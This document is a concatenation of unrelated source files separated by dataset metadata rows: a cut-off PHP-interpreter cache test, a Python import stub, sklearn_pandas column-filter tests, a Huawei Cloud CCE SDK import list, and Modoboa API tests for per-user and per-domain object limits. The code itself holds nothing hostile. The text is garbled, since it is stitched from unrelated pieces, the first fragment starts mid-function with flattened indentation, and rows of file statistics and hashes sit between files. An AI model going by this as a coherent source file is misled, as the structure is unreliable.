#
output2 = self.run('''
function myf2197123($a, $b) { return $a - $b; }
echo myf2197123(100, 20);
''')
assert self.space.int_w(output2[0]) == 80
cell2 = self.space.global_function_cache.get_cell('myf2197123', object())
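        # Redefinition reuses the same cell, but the cached constant_value
        # no longer matches the currently declared function, so the JIT can
        # no longer fold it as a constant.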
assert cell2 is cell
assert not cell2.constant_value_is_currently_declared
assert cell2.constant_value is not cell2.currently_declared
def test_declare_class(self):
class_name = "MyClass%s" % uuid.uuid4().hex
class_cache = self.space.global_class_cache
self.run("class %s { function f() { return 666;} };" % class_name)
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell.constant_value_is_currently_declared
assert cell.constant_value is cell.currently_declared
self.run("class %s { function f() { return 667;} };" % class_name)
cell2 = class_cache.get_cell(class_name, class_cache.version)
assert cell2 is cell
assert not cell2.constant_value_is_currently_declared
assert cell2.constant_value is not cell2.currently_declared
def test_has_definition(self):
output = self.run('''
define('fooBAR', 42);
''')
assert self.space.global_constant_cache.has_definition('fooBAR')
assert not self.space.global_constant_cache.has_definition('foobar')
def test_nonexistent_constant(self):
class_name = "MyClass%s" % uuid.uuid4().hex
class_cache = self.space.global_class_cache
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell is None
def test_nonexistent_constant_then_defined_later(self):
class_name = "MyClass%s" % uuid.uuid4().hex
class_cache = self.space.global_class_cache
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell is None
self.run("class %s { function f() { return 666;} };" % class_name)
cell = class_cache.get_cell(class_name, class_cache.version)
assert cell.constant_value_is_currently_declared
assert cell.constant_value is cell.currently_declared
| 37.763889 | 81 | 0.678558 | 346 | 2,719 | 5.060694 | 0.182081 | 0.091376 | 0.085665 | 0.078812 | 0.809252 | 0.809252 | 0.785266 | 0.769275 | 0.715591 | 0.715591 | 0 | 0.039355 | 0.224347 | 2,719 | 71 | 82 | 38.295775 | 0.790896 | 0 | 0 | 0.584906 | 0 | 0 | 0.15379 | 0 | 0 | 0 | 0 | 0 | 0.339623 | 1 | 0.09434 | false | 0 | 0.037736 | 0 | 0.150943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc3a8ddcefec24db05c6bbc609d3f6f1923eb78d | 223 | py | Python | cd/modules/voice/checks/__init__.py | Axelware/cd-bot | d9b704d50b86ea25238242ae67c93e447b24636e | [
"MIT"
] | 1 | 2022-03-20T00:53:35.000Z | 2022-03-20T00:53:35.000Z | cd/modules/voice/checks/__init__.py | Axelware/cd-bot | d9b704d50b86ea25238242ae67c93e447b24636e | [
"MIT"
] | 1 | 2022-03-23T18:38:52.000Z | 2022-03-23T22:24:53.000Z | cd/modules/voice/checks/__init__.py | Axelware/cd-bot | d9b704d50b86ea25238242ae67c93e447b24636e | [
"MIT"
] | null | null | null | # Future
from __future__ import annotations
# Local
from .is_author_connected import *
from .is_player_connected import *
from .is_player_playing import *
from .is_queue_not_empty import *
from .is_track_seekable import *
| 22.3 | 34 | 0.816143 | 32 | 223 | 5.21875 | 0.46875 | 0.179641 | 0.287425 | 0.251497 | 0.323353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130045 | 223 | 9 | 35 | 24.777778 | 0.860825 | 0.053812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc87e384b5904ae118ad9ad45a0459eaeb134d13 | 6,244 | py | Python | sklearn_pandas/tests/test_Column_Filter.py | toddbenanzer/sklearn_pandas | 36e24c55ef4829aa261963201c346869097d4931 | [
"MIT"
] | null | null | null | sklearn_pandas/tests/test_Column_Filter.py | toddbenanzer/sklearn_pandas | 36e24c55ef4829aa261963201c346869097d4931 | [
"MIT"
] | null | null | null | sklearn_pandas/tests/test_Column_Filter.py | toddbenanzer/sklearn_pandas | 36e24c55ef4829aa261963201c346869097d4931 | [
"MIT"
] | null | null | null | import pytest
import pandas as pd  # used throughout; don't rely on the star import for it
from sklearn_pandas.transformers.column_filter import *
def test_ColumnSelector_all_columns_ColumnSelector():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
cs = ColumnSelector(columns=None)
pd.testing.assert_frame_equal(df, cs.fit_transform(df))
def test_ColumnSelector_select_columns_ColumnSelector():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_out = pd.DataFrame({'A': [1, 1, ]})
cs = ColumnSelector(columns=['A'])
pd.testing.assert_frame_equal(expected_out, cs.fit_transform(df))
def test_ColumnSelector_reverse_order_ColumnSelector():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_out = pd.DataFrame({'B': [1, 1, ], 'A': [1, 1, ]})
cs = ColumnSelector(columns=['B', 'A'])
pd.testing.assert_frame_equal(expected_out, cs.fit_transform(df))
def test_DropColumns_no_columns_DropColumns():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
dc = DropColumns(columns=None)
pd.testing.assert_frame_equal(df, dc.fit_transform(df))
def test_DropColumns_one_columns_DropColumns():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_df = pd.DataFrame({'A': [1, 1, ], })
dc = DropColumns(columns=['B'])
pd.testing.assert_frame_equal(expected_df, dc.fit_transform(df))
def test_DropColumns_all_columns_DropColumns():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 1, ]})
expected_df = pd.DataFrame({'A': [1, 1, ], })
dc = DropColumns(columns=['A', 'B'])
pd.testing.assert_frame_equal(
expected_df.drop(columns='A'), dc.fit_transform(df))
def test_ColumnSearchSelect_all_columns_ColumnSearchSelect():
df = pd.DataFrame(columns=['aa', 'ab', 'ba', 'bb', 'cc'])
css = ColumnSearchSelect()
pd.testing.assert_index_equal(df.columns, css.fit_transform(df).columns)
def test_ColumnSearchSelect_a_prefix_ColumnSearchSelect():
df = pd.DataFrame(columns=['aa', 'ab', 'ba', 'bb', 'cc'])
expected_df = pd.DataFrame(columns=['aa', 'ab', ])
css = ColumnSearchSelect(prefix='a')
pd.testing.assert_index_equal(
expected_df.columns, css.fit_transform(df).columns)
def test_ColumnSearchSelect_a_suffix_ColumnSearchSelect():
df = pd.DataFrame(columns=['aa', 'ab', 'ba', 'bb', 'cc'])
expected_df = pd.DataFrame(columns=['aa', 'ba', ])
css = ColumnSearchSelect(suffix='a')
pd.testing.assert_index_equal(
expected_df.columns, css.fit_transform(df).columns)
def test_UniqueValueFilter_keep_all_UniqueValueFilter():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 2, ]})
uvf = UniqueValueFilter(min_unique_values=1)
pd.testing.assert_frame_equal(df, uvf.fit_transform(df))
def test_UniqueValueFilter_keep_some_UniqueValueFilter():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 2, ]})
expected_df = pd.DataFrame({'B': [1, 2, ]})
uvf = UniqueValueFilter(min_unique_values=2)
pd.testing.assert_frame_equal(expected_df, uvf.fit_transform(df))
def test_UniqueValueFilter_keep_none_UniqueValueFilter():
df = pd.DataFrame({'A': [1, 1, ], 'B': [1, 2, ]})
expected_df = pd.DataFrame({'B': [1, 2, ]}).drop(columns='B')
uvf = UniqueValueFilter(min_unique_values=3)
pd.testing.assert_frame_equal(expected_df, uvf.fit_transform(df))
def test_selector_numerics_ColumnByType():
df = pd.DataFrame(
{'A': [1, 1, ], 'B': ['a', 'b', ], 'C': [True, False, ], })
expected_df = pd.DataFrame({'A': [1, 1, ]})
filter = ColumnByType(numerics=True)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_selector_strings_ColumnByType():
df = pd.DataFrame(
{'A': [1, 1, ], 'B': ['a', 'b', ], 'C': [True, False, ], })
expected_df = pd.DataFrame({'B': ['a', 'b', ], })
filter = ColumnByType(strings=True)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_selector_booleans_ColumnByType():
df = pd.DataFrame(
{'A': [1, 1, ], 'B': ['a', 'b', ], 'C': [True, False, ], })
expected_df = pd.DataFrame({'C': [True, False, ], })
filter = ColumnByType(booleans=True)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_UniqueValueFilter_base_CorrelationFilter():
df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'B': [1, 2, 3, 4, 4, ],
'C': [1, 2, 3, 4, 4, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
expected_df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
filter = CorrelationFilter()
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_UniqueValueFilter_spearman_CorrelationFilter():
df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'B': [1, 2, 3, 4, 4, ],
'C': [1, 2, 3, 4, 4, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
expected_df = pd.DataFrame({
'A': [1, 2, 3, 4, 5, ],
'D': [1, 2, 3, 3, 3, ],
'E': [5, 2, 1, 4, 3, ],
})
filter = CorrelationFilter(method='spearman')
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(df))
def test_basic_function_PandasSelectKBest():
X = pd.DataFrame({
'A': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ],
'B': [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, ],
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
y = pd.DataFrame({
'y': [0, 1, 2, 1, 0, 1, 2, 1, 0, 1],
})
expected_df = pd.DataFrame({
'B': [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, ],
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
filter = PandasSelectKBest(k=2)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(X, y))
def test_basic_function_one_var_PandasSelectKBest():
X = pd.DataFrame({
'A': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ],
'B': [1, 2, 3, 4, 5, 5, 4, 3, 2, 1, ],
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
y = pd.DataFrame({
'y': [0, 1, 2, 1, 0, 1, 2, 1, 0, 1],
})
expected_df = pd.DataFrame({
'C': [1, 2, 3, 4, 2, 3, 4, 3, 2, 1, ],
})
filter = PandasSelectKBest(k=1)
pd.testing.assert_frame_equal(expected_df, filter.fit_transform(X, y))
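# A minimal composition sketch (illustrative, not an assertion-backed test):
# the transformers above follow sklearn's fit/transform protocol, so they
# should compose in a standard Pipeline. Column values here are arbitrary.
def example_pipeline_composition():
    from sklearn.pipeline import make_pipeline
    df = pd.DataFrame({
        'A': [1, 2, 3, 4],          # numeric with 4 unique values -> kept
        'B': ['a', 'b', 'a', 'b'],  # string column -> dropped by ColumnByType
        'C': [1, 1, 1, 1],          # numeric but constant -> dropped by the filter
    })
    pipe = make_pipeline(ColumnByType(numerics=True),
                         UniqueValueFilter(min_unique_values=2))
    return pipe.fit_transform(df)  # DataFrame with only column 'A'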
| 34.688889 | 76 | 0.586963 | 899 | 6,244 | 3.89099 | 0.093437 | 0.116352 | 0.111492 | 0.078045 | 0.867353 | 0.845912 | 0.818182 | 0.802744 | 0.722413 | 0.702973 | 0 | 0.051672 | 0.209641 | 6,244 | 179 | 77 | 34.882682 | 0.657143 | 0 | 0 | 0.604317 | 0 | 0 | 0.02066 | 0 | 0 | 0 | 0 | 0 | 0.136691 | 1 | 0.136691 | false | 0 | 0.014388 | 0 | 0.151079 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc92c7a83f311e4931133f7b99ae4f2015d176cb | 9,561 | py | Python | huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
# import models into model package
from huaweicloudsdkcce.v3.model.addon_instance import AddonInstance
from huaweicloudsdkcce.v3.model.addon_instance_status import AddonInstanceStatus
from huaweicloudsdkcce.v3.model.addon_template import AddonTemplate
from huaweicloudsdkcce.v3.model.authenticating_proxy import AuthenticatingProxy
from huaweicloudsdkcce.v3.model.authentication import Authentication
from huaweicloudsdkcce.v3.model.awake_cluster_request import AwakeClusterRequest
from huaweicloudsdkcce.v3.model.awake_cluster_response import AwakeClusterResponse
from huaweicloudsdkcce.v3.model.cce_cluster_node_information import CCEClusterNodeInformation
from huaweicloudsdkcce.v3.model.cce_cluster_node_information_metadata import CCEClusterNodeInformationMetadata
from huaweicloudsdkcce.v3.model.cce_job import CCEJob
from huaweicloudsdkcce.v3.model.cce_job_metadata import CCEJobMetadata
from huaweicloudsdkcce.v3.model.cce_job_spec import CCEJobSpec
from huaweicloudsdkcce.v3.model.cce_job_status import CCEJobStatus
from huaweicloudsdkcce.v3.model.cert_duration import CertDuration
from huaweicloudsdkcce.v3.model.cluster_cert import ClusterCert
from huaweicloudsdkcce.v3.model.cluster_endpoints import ClusterEndpoints
from huaweicloudsdkcce.v3.model.cluster_information import ClusterInformation
from huaweicloudsdkcce.v3.model.cluster_information_spec import ClusterInformationSpec
from huaweicloudsdkcce.v3.model.cluster_metadata import ClusterMetadata
from huaweicloudsdkcce.v3.model.cluster_status import ClusterStatus
from huaweicloudsdkcce.v3.model.clusters import Clusters
from huaweicloudsdkcce.v3.model.container_network import ContainerNetwork
from huaweicloudsdkcce.v3.model.context import Context
from huaweicloudsdkcce.v3.model.contexts import Contexts
from huaweicloudsdkcce.v3.model.create_addon_instance_request import CreateAddonInstanceRequest
from huaweicloudsdkcce.v3.model.create_addon_instance_response import CreateAddonInstanceResponse
from huaweicloudsdkcce.v3.model.create_cloud_persistent_volume_claims_request import CreateCloudPersistentVolumeClaimsRequest
from huaweicloudsdkcce.v3.model.create_cloud_persistent_volume_claims_response import CreateCloudPersistentVolumeClaimsResponse
from huaweicloudsdkcce.v3.model.create_cluster_request import CreateClusterRequest
from huaweicloudsdkcce.v3.model.create_cluster_response import CreateClusterResponse
from huaweicloudsdkcce.v3.model.create_kubernetes_cluster_cert_request import CreateKubernetesClusterCertRequest
from huaweicloudsdkcce.v3.model.create_kubernetes_cluster_cert_response import CreateKubernetesClusterCertResponse
from huaweicloudsdkcce.v3.model.create_node_pool_request import CreateNodePoolRequest
from huaweicloudsdkcce.v3.model.create_node_pool_response import CreateNodePoolResponse
from huaweicloudsdkcce.v3.model.create_node_request import CreateNodeRequest
from huaweicloudsdkcce.v3.model.create_node_response import CreateNodeResponse
from huaweicloudsdkcce.v3.model.delete_addon_instance_request import DeleteAddonInstanceRequest
from huaweicloudsdkcce.v3.model.delete_addon_instance_response import DeleteAddonInstanceResponse
from huaweicloudsdkcce.v3.model.delete_cloud_persistent_volume_claims_request import DeleteCloudPersistentVolumeClaimsRequest
from huaweicloudsdkcce.v3.model.delete_cloud_persistent_volume_claims_response import DeleteCloudPersistentVolumeClaimsResponse
from huaweicloudsdkcce.v3.model.delete_cluster_request import DeleteClusterRequest
from huaweicloudsdkcce.v3.model.delete_cluster_response import DeleteClusterResponse
from huaweicloudsdkcce.v3.model.delete_node_pool_request import DeleteNodePoolRequest
from huaweicloudsdkcce.v3.model.delete_node_pool_response import DeleteNodePoolResponse
from huaweicloudsdkcce.v3.model.delete_node_request import DeleteNodeRequest
from huaweicloudsdkcce.v3.model.delete_node_response import DeleteNodeResponse
from huaweicloudsdkcce.v3.model.delete_status import DeleteStatus
from huaweicloudsdkcce.v3.model.eni_network import EniNetwork
from huaweicloudsdkcce.v3.model.hibernate_cluster_request import HibernateClusterRequest
from huaweicloudsdkcce.v3.model.hibernate_cluster_response import HibernateClusterResponse
from huaweicloudsdkcce.v3.model.host_network import HostNetwork
from huaweicloudsdkcce.v3.model.instance_request import InstanceRequest
from huaweicloudsdkcce.v3.model.instance_request_spec import InstanceRequestSpec
from huaweicloudsdkcce.v3.model.instance_spec import InstanceSpec
from huaweicloudsdkcce.v3.model.list_addon_instances_request import ListAddonInstancesRequest
from huaweicloudsdkcce.v3.model.list_addon_instances_response import ListAddonInstancesResponse
from huaweicloudsdkcce.v3.model.list_addon_templates_request import ListAddonTemplatesRequest
from huaweicloudsdkcce.v3.model.list_addon_templates_response import ListAddonTemplatesResponse
from huaweicloudsdkcce.v3.model.list_clusters_request import ListClustersRequest
from huaweicloudsdkcce.v3.model.list_clusters_response import ListClustersResponse
from huaweicloudsdkcce.v3.model.list_node_pools_request import ListNodePoolsRequest
from huaweicloudsdkcce.v3.model.list_node_pools_response import ListNodePoolsResponse
from huaweicloudsdkcce.v3.model.list_nodes_request import ListNodesRequest
from huaweicloudsdkcce.v3.model.list_nodes_response import ListNodesResponse
from huaweicloudsdkcce.v3.model.login import Login
from huaweicloudsdkcce.v3.model.master_spec import MasterSpec
from huaweicloudsdkcce.v3.model.metadata import Metadata
from huaweicloudsdkcce.v3.model.nic_spec import NicSpec
from huaweicloudsdkcce.v3.model.node_management import NodeManagement
from huaweicloudsdkcce.v3.model.node_metadata import NodeMetadata
from huaweicloudsdkcce.v3.model.node_nic_spec import NodeNicSpec
from huaweicloudsdkcce.v3.model.node_pool import NodePool
from huaweicloudsdkcce.v3.model.node_pool_metadata import NodePoolMetadata
from huaweicloudsdkcce.v3.model.node_pool_node_autoscaling import NodePoolNodeAutoscaling
from huaweicloudsdkcce.v3.model.node_pool_spec import NodePoolSpec
from huaweicloudsdkcce.v3.model.node_pool_status import NodePoolStatus
from huaweicloudsdkcce.v3.model.persistent_volume_claim import PersistentVolumeClaim
from huaweicloudsdkcce.v3.model.persistent_volume_claim_metadata import PersistentVolumeClaimMetadata
from huaweicloudsdkcce.v3.model.persistent_volume_claim_spec import PersistentVolumeClaimSpec
from huaweicloudsdkcce.v3.model.persistent_volume_claim_status import PersistentVolumeClaimStatus
from huaweicloudsdkcce.v3.model.resource_requirements import ResourceRequirements
from huaweicloudsdkcce.v3.model.resource_tag import ResourceTag
from huaweicloudsdkcce.v3.model.runtime import Runtime
from huaweicloudsdkcce.v3.model.show_addon_instance_request import ShowAddonInstanceRequest
from huaweicloudsdkcce.v3.model.show_addon_instance_response import ShowAddonInstanceResponse
from huaweicloudsdkcce.v3.model.show_cluster_metadata import ShowClusterMetadata
from huaweicloudsdkcce.v3.model.show_cluster_request import ShowClusterRequest
from huaweicloudsdkcce.v3.model.show_cluster_response import ShowClusterResponse
from huaweicloudsdkcce.v3.model.show_job_request import ShowJobRequest
from huaweicloudsdkcce.v3.model.show_job_response import ShowJobResponse
from huaweicloudsdkcce.v3.model.show_node_pool_request import ShowNodePoolRequest
from huaweicloudsdkcce.v3.model.show_node_pool_response import ShowNodePoolResponse
from huaweicloudsdkcce.v3.model.show_node_request import ShowNodeRequest
from huaweicloudsdkcce.v3.model.show_node_response import ShowNodeResponse
from huaweicloudsdkcce.v3.model.support_versions import SupportVersions
from huaweicloudsdkcce.v3.model.taint import Taint
from huaweicloudsdkcce.v3.model.templatespec import Templatespec
from huaweicloudsdkcce.v3.model.update_addon_instance_request import UpdateAddonInstanceRequest
from huaweicloudsdkcce.v3.model.update_addon_instance_response import UpdateAddonInstanceResponse
from huaweicloudsdkcce.v3.model.update_cluster_request import UpdateClusterRequest
from huaweicloudsdkcce.v3.model.update_cluster_response import UpdateClusterResponse
from huaweicloudsdkcce.v3.model.update_node_pool_request import UpdateNodePoolRequest
from huaweicloudsdkcce.v3.model.update_node_pool_response import UpdateNodePoolResponse
from huaweicloudsdkcce.v3.model.update_node_request import UpdateNodeRequest
from huaweicloudsdkcce.v3.model.update_node_response import UpdateNodeResponse
from huaweicloudsdkcce.v3.model.user import User
from huaweicloudsdkcce.v3.model.user_password import UserPassword
from huaweicloudsdkcce.v3.model.user_tag import UserTag
from huaweicloudsdkcce.v3.model.users import Users
from huaweicloudsdkcce.v3.model.v3_cluster import V3Cluster
from huaweicloudsdkcce.v3.model.v3_cluster_spec import V3ClusterSpec
from huaweicloudsdkcce.v3.model.v3_node import V3Node
from huaweicloudsdkcce.v3.model.v3_node_bandwidth import V3NodeBandwidth
from huaweicloudsdkcce.v3.model.v3_node_create_request import V3NodeCreateRequest
from huaweicloudsdkcce.v3.model.v3_node_eip_spec import V3NodeEIPSpec
from huaweicloudsdkcce.v3.model.v3_node_public_ip import V3NodePublicIP
from huaweicloudsdkcce.v3.model.v3_node_spec import V3NodeSpec
from huaweicloudsdkcce.v3.model.v3_node_status import V3NodeStatus
from huaweicloudsdkcce.v3.model.v3_volume import V3Volume
from huaweicloudsdkcce.v3.model.versions import Versions
from huaweicloudsdkcce.v3.model.volume_metadata import VolumeMetadata
| 75.283465 | 127 | 0.909424 | 1,096 | 9,561 | 7.713504 | 0.169708 | 0.300568 | 0.329193 | 0.400757 | 0.492075 | 0.428555 | 0.192335 | 0.054412 | 0.028862 | 0 | 0 | 0.01567 | 0.052191 | 9,561 | 126 | 128 | 75.880952 | 0.917237 | 0.004811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.008197 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d7c99a7d5a6fd6a64c5b7a7fa3886bc5a020ddd | 9,373 | py | Python | modoboa/limits/tests/test_api.py | vinaebizs/modoboa | fb1e7f4c023b7eb6be3aa77174bfa12fc653670e | [
"0BSD"
] | null | null | null | modoboa/limits/tests/test_api.py | vinaebizs/modoboa | fb1e7f4c023b7eb6be3aa77174bfa12fc653670e | [
"0BSD"
] | null | null | null | modoboa/limits/tests/test_api.py | vinaebizs/modoboa | fb1e7f4c023b7eb6be3aa77174bfa12fc653670e | [
"0BSD"
] | null | null | null | # coding: utf-8
"""Test cases for the limits extension."""
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from modoboa.admin.factories import populate_database
from modoboa.admin.models import Domain
from modoboa.core import factories as core_factories
from modoboa.core.models import User
from modoboa.lib import parameters
from modoboa.lib import tests as lib_tests
from .. import utils
class APIAdminLimitsTestCase(lib_tests.ModoAPITestCase):
    """Check that per-user limits are also enforced by the API."""
@classmethod
def setUpTestData(cls):
"""Create test data."""
super(APIAdminLimitsTestCase, cls).setUpTestData()
for name, tpl in utils.get_user_limit_templates():
parameters.save_admin(
"DEFLT_USER_{}_LIMIT".format(name.upper()), 2)
populate_database()
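        # Every per-user object limit is capped at 2, so each test below
        # expects the second creation to reach the cap and the third to be
        # rejected with HTTP 400.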
cls.user = User.objects.get(username="admin@test.com")
cls.da_token = Token.objects.create(user=cls.user)
cls.reseller = core_factories.UserFactory(
username="reseller", groups=("Resellers", ),
)
cls.r_token = Token.objects.create(user=cls.reseller)
def test_domadmins_limit(self):
"""Check domain admins limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.r_token.key)
limit = self.reseller.userobjectlimit_set.get(name="domain_admins")
url = reverse("external_api:account-list")
data = {
"username": "fromapi@test.com",
"role": "DomainAdmins",
"password": "Toto1234",
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["username"] = "fromapi2@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["username"] = "fromapi3@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
user = User.objects.get(username="user@test.com")
domain = Domain.objects.get(name="test.com")
domain.add_admin(self.reseller)
url = reverse("external_api:account-detail", args=[user.pk])
data = {
"username": user.username,
"role": "DomainAdmins",
"password": "Toto1234",
"mailbox": {
"full_address": user.username,
"quota": user.mailbox.quota
}
}
response = self.client.put(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_domains_limit(self):
"""Check domains limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.r_token.key)
limit = self.reseller.userobjectlimit_set.get(name="domains")
url = reverse("external_api:domain-list")
data = {"name": "test3.com", "quota": 10}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["name"] = "test4.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
        data["name"] = "test5.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_domain_aliases_limit(self):
"""Check domain aliases limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.r_token.key)
domain = Domain.objects.get(name="test.com")
domain.add_admin(self.reseller)
limit = self.reseller.userobjectlimit_set.get(name="domain_aliases")
url = reverse("external_api:domain_alias-list")
data = {"name": "dalias1.com", "target": domain.pk}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["name"] = "dalias2.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
        data["name"] = "dalias3.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_mailboxes_limit(self):
"""Check mailboxes limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.da_token.key)
limit = self.user.userobjectlimit_set.get(name="mailboxes")
url = reverse("external_api:account-list")
data = {
"username": "fromapi@test.com",
"role": "SimpleUsers",
"password": "Toto1234",
"mailbox": {
"full_address": "fromapi@test.com",
"quota": 10
}
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["username"] = "fromapi2@test.com"
data["mailbox"]["full_address"] = "fromapi2@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["username"] = "fromapi3@test.com"
data["mailbox"]["full_address"] = "fromapi3@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_aliases_limit(self):
"""Check mailbox aliases limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.da_token.key)
limit = self.user.userobjectlimit_set.get(name="mailbox_aliases")
url = reverse("external_api:alias-list")
data = {
"address": "alias_fromapi@test.com",
"recipients": [
"user@test.com", "postmaster@test.com", "user_éé@nonlocal.com"
]
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["address"] = "alias_fromapi2@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["address"] = "alias_fromapi3@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
class APIDomainLimitsTestCase(lib_tests.ModoAPITestCase):
    """Check that per-domain limits are also enforced by the API."""
@classmethod
def setUpTestData(cls):
"""Create test data."""
super(APIDomainLimitsTestCase, cls).setUpTestData()
parameters.save_admin("ENABLE_DOMAIN_LIMITS", "yes")
for name, tpl in utils.get_domain_limit_templates():
parameters.save_admin(
"DEFLT_DOMAIN_{}_LIMIT".format(name.upper()), 2)
populate_database()
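        # Every per-domain object limit is capped at 2; populate_database()
        # already consumes some of these quotas, so several tests start from
        # an exceeded state.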
def test_mailboxes_limit(self):
"""Check mailboxes limit."""
domain = Domain.objects.get(name="test.com")
limit = domain.domainobjectlimit_set.get(name="mailboxes")
self.assertTrue(limit.is_exceeded())
url = reverse("external_api:account-list")
data = {
"username": "fromapi@test.com",
"role": "SimpleUsers",
"password": "Toto1234",
"mailbox": {
"full_address": "fromapi@test.com",
"quota": 10
}
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_domain_aliases_limit(self):
"""Check domain_aliases limit."""
domain = Domain.objects.get(name="test.com")
limit = domain.domainobjectlimit_set.get(name="domain_aliases")
url = reverse("external_api:domain_alias-list")
data = {"name": "dalias1.com", "target": domain.pk}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
data["name"] = "dalias2.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["name"] = "dalias3.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
